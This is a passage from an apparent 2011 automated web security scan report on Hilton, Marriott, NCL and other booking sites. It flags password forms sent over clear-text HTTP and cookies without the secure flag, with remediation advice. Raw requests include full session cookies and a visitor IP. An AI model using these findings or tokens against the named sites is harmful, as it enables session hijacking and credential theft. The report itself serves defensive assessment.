Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Content-Length: 57662
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:52:41 GMT
Connection: close
Set-Cookie: cross-sell=hi; Domain=hilton.com; Path=/
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:03:41 GMT;path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name="msapplication-st
...[SNIP]...
<div id="myreservations" style="display:none;">
           
           
                                                                           <form name="myForm" id="myForm" method="post">
               <div class="containReservationsOptions">
...[SNIP]...
</label><input id="Password_myRes" tabindex="9" name="password" class="frmTextMed" type="password">
                       </fieldset>
...[SNIP]...
7.18. http://www1.hilton.com/en_US/hi/sitemap/index.do  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/sitemap/index.do

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /en_US/hi/sitemap/index.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:03:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:14:47 GMT;path=/
Content-Length: 36912


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name="m
...[SNIP]...
<!--Affiliates changes start here - by kapil taneja-->
               
                   
                                           <form name="frmSignin" action="/doxch.do?dst=https://HI/en/hi/PFSLogin" method="post">
                   
               
               <!--Affiliates changes end here - by kapil taneja-->
...[SNIP]...
<br/>
                   <input id="PasswordPIN" name="password" type="password" tabindex="5" class="frmTextSignin"/><br/>
...[SNIP]...
8. SSL cookie without secure flag set  previous  next
There are 10 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

8.1. https://wwwa.applyonlinenow.com/USCCapp/Ctl/entry  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://wwwa.applyonlinenow.com
Path:   /USCCapp/Ctl/entry

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /USCCapp/Ctl/entry HTTP/1.1
Host: wwwa.applyonlinenow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 302 Found
Date: Mon, 03 Oct 2011 13:02:36 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8l DAV/2
Location: https://wwwa.applyonlinenow.com/USCCapp/static/error.html?error_code=1001
Content-Length: 0
Set-Cookie: JSESSIONID=0000EGXfhNLdzAH9vr8PmirVHqD:-1; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Connection: close
Content-Type: text/plain; charset=ISO-8859-1
Content-Language: en-US

8.2. https://www.cruisesonly.com/bcss/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cruisesonly.com
Path:   /bcss/default.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bcss/default.asp?bn=88888888&ln=xss&custservice_submit.x=10&custservice_submit.y=8&custservice_submit=Y&CID=6386 HTTP/1.1
Host: www.cruisesonly.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruisesonly.com/cs/default.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; JSESSIONID=E5DDBE0407B36DF2815ADD375CCA88F0; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.5.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D1c8fe390ed9e4354eaa4e6f; IncludeAlumniRates=1c8fe3904be4744e95f12c08; AlumniCruiseId=false; shoppingZipCode="Zip Code"; AFF%5FCID=%22%22; sid=6386; NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d2245525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:44:51 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Cteonnt-Length: 46341
Content-Type: text/html
Set-Cookie: partnerStamp=21960764; domain=; path=/
Set-Cookie: AFF%5FCID=6386; expires=Wed, 02-Nov-2011 04:00:00 GMT; path=/
Cache-control: private
Content-Length: 46341


   <script language="Javascript" src="/lib/javascript/validation/messagingobjects.js"></script>
<script language="javascript" src="/code/javascript/JSPopup.js"></script>
   <script languag
...[SNIP]...
8.3. https://www.marriott.com/!crd_prm!.!cm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.marriott.com
Path:   /!crd_prm!.!cm

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /!crd_prm!.!cm?crd_ver=0.9.5&crd_rnd=508779&crd_cnt=0.01&crd_tpb=1317646588001&crd_olt=7782 HTTP/1.1
Host: www.marriott.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://www.marriott.com/reservation/availability.mi?isSearch=true&propertyCode=BOSLA
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; HDFind=true; mbox=check#true#1317646617|session#1317646533235-184575#1317648417|PC#1317646533235-184575.19#1318856157; IS3_History=1317397011-1-67_16-1-__16_; JVMID=pEbizMdcomD167_prd1; MI_SITE=prod3; omniData=count_0*omniMultiSearchlocationbosmaus_indate_outdate*; s_pers=%20s_lv%3D1317646590532%7C1412254590532%3B%20s_lv_s%3DFirst%2520Visit%7C1317648390532%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; IS3_GSV=DPL-2_TES-1317646574_PCT-1317646574_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; ctcData=searchCount_0*resAmount_0*inByTomorrow_true*city_BOS*state_MA*country_US*; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"},"v":1,"pv":2,"to":5,"c":"http://www.marriott.com/search/findHotels.mi","lc":{"d4":{"v":2,"s":true,"e":1}},"cd":4,"sd":4,"f":1317646586583}; fsr.a=1317646594850

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Last-Modified: Wed, 20 Apr 2011 13:16:59 GMT
ETag: "c001-327-708888c0"
Accept-Ranges: bytes
Content-Length: 807
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Content-Type: text/plain
Date: Mon, 03 Oct 2011 12:56:23 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: MI_SITE=prod3;path=/

GIF89a....................................................................................................................................3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f....
...[SNIP]...
8.4. https://www.marriott.com/default.mi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.marriott.com
Path:   /default.mi

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /default.mi HTTP/1.1
Host: www.marriott.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.marriott.com/reservation/expiredSession.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; HDFind=true; mbox=check#true#1317646617|session#1317646533235-184575#1317648417|PC#1317646533235-184575.19#1318856157; IS3_History=1317397011-1-67_16-1-__16_; omniData=count_0*omniMultiSearchlocationbosmaus_indate_outdate*; IS3_GSV=DPL-2_TES-1317646574_PCT-1317646574_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; ctcData=searchCount_0*resAmount_0*inByTomorrow_true*city_BOS*state_MA*country_US*; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"},"v":1,"pv":4,"to":5,"c":"https://www.marriott.com/reservation/expiredSession.mi","lc":{"d4":{"v":4,"s":true,"e":3}},"cd":4,"sd":4,"f":1317646766835}; s_pers=%20s_lv%3D1317646786238%7C1412254786238%3B%20s_lv_s%3DFirst%2520Visit%7C1317648586238%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dmarriottglobal%253D%252526pid%25253Dwww.marriott.com/reservation/expiredSession.mi%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.marriott.com/reservation/cleanSession.mi%2525253Furl%2525253D/%25252526marshaTimeOut%2525253Dfalse%252526ot%25253DA%3B; JVMID=pEbizMdcomD167_prd1; MI_SITE=prod3

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Content-Type: text/html; charset=UTF-8
Set-Cookie: JVMID=pEbizMdcomD167_prd1; Path=/
Set-Cookie: MI_SITE=prod3;path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Vary: Accept-Encoding
Content-Language: en-US
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Date: Mon, 03 Oct 2011 12:59:27 GMT
Content-Length: 99910
Connection: keep-alive


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   

<html xmlns="http://www.w3.org/1999/x
...[SNIP]...
8.5. https://www.marriott.com/reservation/availability.mi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.marriott.com
Path:   /reservation/availability.mi

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /reservation/availability.mi?isSearch=true&propertyCode=BOSLA HTTP/1.1
Host: www.marriott.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.marriott.com/search/findHotels.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; HDFind=true; JVMID=pEbizMdcomD167_prd1; mbox=check#true#1317646617|session#1317646533235-184575#1317648417|PC#1317646533235-184575.19#1318856157; omniData=count_0*omniMultiSearchlocationbosmaus_indate_outdate*; ctcData=searchCount_0*resAmount_0*inByTomorrow_false*city_BOS*state_MA*country_US*; MI_SITE=prod3; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"},"v":1,"pv":2,"to":5,"c":"http://www.marriott.com/search/findHotels.mi","lc":{"d4":{"v":2,"s":true,"e":1}},"cd":4,"sd":4,"f":1317646556133}; IS3_History=1317397011-1-67_16-1-__16_; IS3_GSV=DPL-2_TES-1317646574_PCT-1317646574_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; s_pers=%20s_lv%3D1317646581955%7C1412254581955%3B%20s_lv_s%3DFirst%2520Visit%7C1317648381955%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dmarriottglobal%253D%252526pid%25253Dwww.marriott.com/search/findHotels.mi%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.marriott.com/reservation/availability.mi%2525253FisSearch%2525253Dtrue%25252526propertyCode%2525253DBOSLA%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Content-Type: text/html; charset=UTF-8
Set-Cookie: JVMID=pEbizMdcomD167_prd1; Path=/
Set-Cookie: MI_SITE=prod3;path=/
Pragma: no-cache
Vary: Accept-Encoding
Content-Language: en-US
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Mon, 03 Oct 2011 12:56:19 GMT
Content-Length: 101861
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www
...[SNIP]...
8.6. https://www.marriott.com/reservation/availabilitySearch.mi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.marriott.com
Path:   /reservation/availabilitySearch.mi

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /reservation/availabilitySearch.mi?isSearch=false HTTP/1.1
Host: www.marriott.com
Connection: keep-alive
Content-Length: 566
Cache-Control: max-age=0
Origin: https://www.marriott.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.marriott.com/reservation/availability.mi?isSearch=true&propertyCode=BOSLA
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; HDFind=true; mbox=check#true#1317646617|session#1317646533235-184575#1317648417|PC#1317646533235-184575.19#1318856157; IS3_History=1317397011-1-67_16-1-__16_; JVMID=pEbizMdcomD167_prd1; omniData=count_0*omniMultiSearchlocationbosmaus_indate_outdate*; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; IS3_GSV=DPL-2_TES-1317646574_PCT-1317646574_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; ctcData=searchCount_0*resAmount_0*inByTomorrow_true*city_BOS*state_MA*country_US*; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"},"v":1,"pv":3,"to":5,"c":"https://www.marriott.com/reservation/availability.mi","lc":{"d4":{"v":3,"s":true,"e":2}},"cd":4,"sd":4,"f":1317646586583}; MI_SITE=prod3; s_pers=%20s_lv%3D1317646762445%7C1412254762445%3B%20s_lv_s%3DFirst%2520Visit%7C1317648562445%3B

accountId=&fromDate=10%2F3%2F11&minDate=10%2F03%2F2011&maxDate=09%2F23%2F2012&monthNames=January%2CFebruary%2CMarch%2CApril%2CMay%2CJune%2CJuly%2CAugust%2CSeptember%2COctober%2CNovember%2CDecember&wee
...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Cache-Control: no-cache,no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://www.marriott.com/reservation/expiredSession.mi
Content-Length: 0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Date: Mon, 03 Oct 2011 12:59:01 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JVMID=pEbizMdcomD167_prd1; Path=/
Set-Cookie: MI_SITE=prod3;path=/

8.7. https://www.marriott.com/reservation/cleanSession.mi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.marriott.com
Path:   /reservation/cleanSession.mi

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /reservation/cleanSession.mi?url=/&marshaTimeOut=false HTTP/1.1
Host: www.marriott.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.marriott.com/reservation/expiredSession.mi
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; HDFind=true; mbox=check#true#1317646617|session#1317646533235-184575#1317648417|PC#1317646533235-184575.19#1318856157; IS3_History=1317397011-1-67_16-1-__16_; JVMID=pEbizMdcomD167_prd1; omniData=count_0*omniMultiSearchlocationbosmaus_indate_outdate*; IS3_GSV=DPL-2_TES-1317646574_PCT-1317646574_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; ctcData=searchCount_0*resAmount_0*inByTomorrow_true*city_BOS*state_MA*country_US*; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"},"v":1,"pv":4,"to":5,"c":"https://www.marriott.com/reservation/expiredSession.mi","lc":{"d4":{"v":4,"s":true,"e":3}},"cd":4,"sd":4,"f":1317646766835}; MI_SITE=prod3; s_pers=%20s_lv%3D1317646786238%7C1412254786238%3B%20s_lv_s%3DFirst%2520Visit%7C1317648586238%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dmarriottglobal%253D%252526pid%25253Dwww.marriott.com/reservation/expiredSession.mi%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.marriott.com/reservation/cleanSession.mi%2525253Furl%2525253D/%25252526marshaTimeOut%2525253Dfalse%252526ot%25253DA%3B

Response

HTTP/1.1 302 Moved Temporarily
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Cache-Control: no-cache,no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://www.marriott.com/
Content-Length: 0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Date: Mon, 03 Oct 2011 12:59:25 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JVMID=pEbizMdcomD167_prd1; Path=/
Set-Cookie: MI_SITE=prod3;path=/

8.8. https://www.marriott.com/reservation/expiredSession.mi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.marriott.com
Path:   /reservation/expiredSession.mi

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /reservation/expiredSession.mi HTTP/1.1
Host: www.marriott.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.marriott.com/reservation/availability.mi?isSearch=true&propertyCode=BOSLA
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; HDFind=true; mbox=check#true#1317646617|session#1317646533235-184575#1317648417|PC#1317646533235-184575.19#1318856157; IS3_History=1317397011-1-67_16-1-__16_; omniData=count_0*omniMultiSearchlocationbosmaus_indate_outdate*; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; IS3_GSV=DPL-2_TES-1317646574_PCT-1317646574_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; ctcData=searchCount_0*resAmount_0*inByTomorrow_true*city_BOS*state_MA*country_US*; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"},"v":1,"pv":3,"to":5,"c":"https://www.marriott.com/reservation/availability.mi","lc":{"d4":{"v":3,"s":true,"e":2}},"cd":4,"sd":4,"f":1317646586583}; s_pers=%20s_lv%3D1317646762445%7C1412254762445%3B%20s_lv_s%3DFirst%2520Visit%7C1317648562445%3B; JVMID=pEbizMdcomD167_prd1; MI_SITE=prod3

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Content-Type: text/html; charset=UTF-8
Set-Cookie: JVMID=pEbizMdcomD167_prd1; Path=/
Set-Cookie: MI_SITE=prod3;path=/
Pragma: no-cache
Vary: Accept-Encoding
Content-Language: en-US
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Mon, 03 Oct 2011 12:59:04 GMT
Content-Length: 25752
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www
...[SNIP]...
8.9. https://www.marriott.com/reservation/rateListMenu.mi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.marriott.com
Path:   /reservation/rateListMenu.mi

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /reservation/rateListMenu.mi HTTP/1.1
Host: www.marriott.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.marriott.com/reservation/availability.mi?isSearch=true&propertyCode=BOSLA
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000I7eCs-h_jXEOadoR_gF70u5:169bo19ig; MI_Visitor=I7eCs-h_jXEOadoR_gF70u5; s_vi=[CS]v1|2744D859050118C6-4000010AC02572EF[CE]; HDFind=true; mbox=check#true#1317646617|session#1317646533235-184575#1317648417|PC#1317646533235-184575.19#1318856157; IS3_History=1317397011-1-67_16-1-__16_; omniData=count_0*omniMultiSearchlocationbosmaus_indate_outdate*; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; IS3_GSV=DPL-2_TES-1317646574_PCT-1317646574_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; ctcData=searchCount_0*resAmount_0*inByTomorrow_true*city_BOS*state_MA*country_US*; fsr.s={"cp":{"TLSessionID":"foreseeJSessionId"},"v":1,"pv":3,"to":5,"c":"https://www.marriott.com/reservation/availability.mi","lc":{"d4":{"v":3,"s":true,"e":2}},"cd":4,"sd":4,"f":1317646586583}; s_pers=%20s_lv%3D1317646762445%7C1412254762445%3B%20s_lv_s%3DFirst%2520Visit%7C1317648562445%3B; JVMID=pEbizMdcomD167_prd1; MI_SITE=prod3

Response

HTTP/1.1 302 Moved Temporarily
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Cache-Control: no-cache,no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://www.marriott.com/reservation/expiredSession.mi
Content-Length: 0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Date: Mon, 03 Oct 2011 12:59:01 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JVMID=pEbizMdcomD167_prd1; Path=/
Set-Cookie: MI_SITE=prod3;path=/

8.10. https://www2.ncl.com/vacations  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ncl.com
Path:   /vacations

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /vacations HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Drupal-Cache: MISS
Last-Modified: Mon, 03 Oct 2011 13:02:52 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1317646972"
X-Ncl-SLog: 10.5.44.30
Content-Type: text/html; charset=utf-8
Date: Mon, 03 Oct 2011 13:02:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Cookie=R1788641230; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:02:53 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:02:53 GMT; path=/; domain=ncl.com
Content-Length: 195543

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
